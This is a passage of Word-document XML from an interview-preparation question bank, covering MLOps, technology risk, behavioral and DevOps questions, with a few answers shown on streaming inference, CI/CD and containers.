        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1568. What is explainable AI?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1569. What is model lineage?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1570. Explain feature importance.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1571. What is hyperparameter tuning?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1572. What is AutoML?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1573. Explain distributed training.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1574. What is GPU scheduling?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1575. Explain TPU usage.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1576. What is online learning?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1577. Explain retraining strategies.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1578. What is active learning?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1579. Explain ML observability.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1580. What is model bias?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1581. Explain fairness in ML.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1582. What is ML debt?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1583. Explain training-serving skew.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1584. What is model serialization?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1585. Difference between Pickle and ONNX?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1586. Explain feature pipelines.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1587. What is metadata management?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1588. Explain ML experimentation.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1589. What is a champion-challenger model?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1590. Explain CI/CD for ML.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1591. What is CT in MLOps?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1592. What is reproducible training?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1593. Explain model packaging.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1594. What is inference optimization?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1595. Explain quantization.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1596. What is pruning in ML?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1597. Explain distributed inference.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1598. What is edge ML?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1599. Explain federated learning.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1600. What is ML monitoring?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1601. Explain alerting in ML systems.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1602. What is data labeling?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1603. Explain weak supervision.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1604. What is synthetic data?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1605. Explain model serving architectures.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1606. What is asynchronous inference?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1607. Explain streaming inference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Streaming inference is a machine learning inference approach where predictions are generated continuously on real-time data streams as data arrives, instead of processing data in batches.</w:t>
        <w:br/>
        <w:t>It is used in systems that require immediate insights and low-latency decision-making.</w:t>
        <w:br/>
        <w:t>How Streaming Inference Works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Data continuously flows from sources like sensors, logs, transactions, or user events</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Streaming platforms ingest the data in real time</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. ML models process incoming events instantly</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Predictions or actions are generated continuously</w:t>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fraud detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Recommendation systems</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IoT monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Predictive maintenance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time analytics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Autonomous vehicles</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stock market analysis</w:t>
        <w:br/>
        <w:t>Key Characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time processing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Low latency inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous event handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High scalability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Event-driven architecture</w:t>
        <w:br/>
        <w:t>Components in Streaming Inference Architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data producers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Message brokers or streaming platforms</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Stream processing engines</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model serving layer</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and alerting systems</w:t>
        <w:br/>
        <w:t>Popular Technologies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Kafka</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Flink</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Spark Streaming</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * KServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ray Serve</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Immediate predictions and actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Faster business response</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Better customer experience</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time anomaly detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous operational intelligence</w:t>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * High infrastructure complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scalability management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time monitoring requirements</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fault tolerance and recovery handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handling data spikes and ordering issues</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, streaming inference is essential for building scalable, low-latency, and event-driven AI systems capable of processing real-time production workloads continuously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1608. What is feature parity?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1609. Explain data contracts.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1610. What is feature freshness?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1611. Explain batch scoring pipelines.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1612. What is pipeline caching?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1613. Explain DAG-based workflows.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1614. What is Airflow?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1615. Explain Prefect.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1616. What is Dagster?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1617. Explain model retraining triggers.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1618. What are SLA/SLO/SLI in ML systems?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1619. Explain ML incident management.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1620. What is responsible AI?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1621. Explain model deployment strategies.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1622. Describe an end-to-end MLOps architecture.</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Technology Risk - Technical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1623. Risk register and heatmap: What fields would you maintain in a technology risk register, how would you score likelihood/impact, and how would you convert it into a leadership heatmap?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1624. Change risk: A major architecture change introduces a new data flow, API gateway, and cloud database. What risk questions would you ask before approval?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1625. FMEA and scenario analysis: How would you use FMEA or scenario analysis to identify high-impact technology failure modes before they become incidents?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1626. Control validation: How would you test whether a control is actually working, for example privileged access, deployment approval, backup restore, or vulnerability SLA closure?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1627. Scenario - vendor breach notification: A third-party SaaS vendor discloses a data breach affecting a system your team integrates with. Walk through your first 24 hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1628. Scenario - audit finds unencrypted backups: An internal audit finds that database backups have been stored unencrypted for 8 months. How would you handle disclosure, remediation, and prevention?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Technology Risk - Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1629. Executive reporting: How would you present a deteriorating risk trend to senior leadership and ask for investment or policy support?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1630. Decision-making: Tell me about a time you had incomplete information but still had to make or recommend a risk decision.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1631. Audit partnership: How would you handle a disagreement with internal or external auditors about severity, evidence, or remediation feasibility?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1632. Leadership reflection: What does success look like for you in a Technology Risk Lead role after six months?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1633. Scenario - failed access review: An access recertification review reveals 12 terminated employees still have active production access. How do you respond and remediate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1634. Scenario - conflicting risk appetite: Business wants to launch a feature that Security rates as high risk. How do you drive the decision to resolution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>HR / Behavioral Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1635. Explain your current role and day-to-day responsibilities.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1636. Why do you want to switch your current job?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1637. Why do you want to work at a product-based company specifically?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1638. What is the most challenging problem you have faced in your career, and how did you handle it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1639. What are your strengths and weaknesses?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1640. Where do you see yourself in 3 years?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1641. What are the areas you do not know well or have not worked on yet?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1642. What is the difference between theoretical knowledge and real-time, hands-on production experience, and how do you bridge that gap?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1643. Have you worked independently on a project, or always as part of a team? Describe an example.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1644. What would you do if an automation script you wrote failed or caused an unintended change in production?</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Basic / One-Liner Concepts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1645. What is DevOps?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DevOps is a culture and set of practices that combines software development and IT operations to shorten the delivery lifecycle, using automation, CI/CD, and shared ownership so teams can build, test, and release software faster and more reliably.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1646. What is a DevOps Engineer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1647. What is the difference between DevOps and Agile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1648. What is Configuration Management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1649. What is CI/CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CI/CD (Continuous Integration / Continuous Delivery or Deployment) is a software development practice that automates the process of building, testing, and releasing applications.</w:t>
        <w:br/>
        <w:t>1. Continuous Integration (CI)</w:t>
        <w:br/>
        <w:t>Developers frequently merge their code changes into a shared repository. Whenever code is committed:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Code is automatically built.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automated tests are executed.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Code quality and security checks are performed.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Issues are detected early.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve"> A developer pushes code to GitHub. A pipeline in Jenkins or GitHub Actions automatically runs unit tests and validates the code.</w:t>
        <w:br/>
        <w:t>2. Continuous Delivery (CD)</w:t>
        <w:br/>
        <w:t>After CI is successful, the application is automatically prepared for deployment.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Packages or Docker images are created.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Artifacts are stored in repositories.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deployment to staging environments is automated.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Production deployment still requires manual approval.</w:t>
        <w:br/>
        <w:t>3. Continuous Deployment (CD)</w:t>
        <w:br/>
        <w:t>An extension of Continuous Delivery where every successful change is automatically deployed to production without manual intervention.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Typical CI/CD Pipeline</w:t>
        <w:br/>
        <w:t>Developer Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Source Control (GitHub/GitLab)</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Build Application</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Run Tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Security &amp; Quality Checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Build Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Push to Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Deploy to Kubernetes/GKE/EKS</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Monitor Application</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster software releases</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced manual effort</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Early bug detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Consistent deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Improved software quality</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster feedback to developers</w:t>
        <w:br/>
        <w:t>Common CI/CD Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Jenkins</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitHub Actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitLab CI/CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Azure DevOps</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Argo CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Tekton</w:t>
        <w:br/>
        <w:t>Interview Answer (1-Minute)</w:t>
        <w:br/>
        <w:t>CI/CD stands for Continuous Integration and Continuous Delivery/Deployment. CI is the practice of automatically building and testing code whenever developers commit changes to a shared repository. CD automates the release process by packaging and deploying the application to staging or production environments. The main goal of CI/CD is to deliver software faster, more reliably, and with fewer errors through automation. In my projects, I have used tools like Jenkins, GitHub Actions, Terraform, Docker, and Kubernetes to automate build, test, and deployment workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1650. What is the difference between Continuous Delivery and Continuous Deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1651. What is a virtual machine (VM), and how does it differ from a container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1652. What is a container?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A container is a lightweight, isolated unit that packages an application with all its dependencies and runs using the host OS's kernel, giving process-level isolation without the overhead of a full virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
